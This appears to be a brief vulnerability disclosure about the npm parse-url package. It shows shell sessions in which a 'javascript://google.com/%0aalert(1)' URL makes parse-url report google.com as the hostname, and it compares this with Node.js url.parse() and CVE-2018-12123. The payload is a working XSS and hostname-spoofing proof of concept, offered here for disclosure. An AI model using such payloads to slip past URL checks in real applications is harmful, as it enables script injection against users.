If use parse-url for security check on url, it is dangerous because hostname spoofing through JavaScript scheme is possible. It also occurred in url.parse() of node.js in 2018, and node.js acknowledged the vulnerability for this. So Node.js has patched it, and there are cases where a CVE was issued after the security release.
sh-3.2$ node -e 'console.log(require("url").parse("javascript://google.com/%0aalert(1)"))'
Url {
protocol: 'javascript:',
slashes: null,
auth: null,
host: null,
port: null,
hostname: null,
hash: null,
search: null,
query: null,
pathname: '//google.com/%0aalert(1)',
path: '//google.com/%0aalert(1)',
href: 'javascript://google.com/%0aalert(1)'
}
sh-3.2$
First of all, the above result is the result of url.parser() of node.js. If hostname is passed, it is recognized as a path.
sh-3.2$ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("javascript://google.com/%0aalert(1)"))'
{
protocols: [ 'javascript' ],
protocol: 'javascript',
port: null,
resource: 'google.com',
user: '',
pathname: '/%0aalert(1)',
hash: '',
search: '',
href: 'javascript://google.com/%0aalert(1)',
query: [Object: null prototype] {}
}
sh-3.2$
But unlike parse-url in node.js, it parses hostname correctly.
Refer to CVE-2018-12123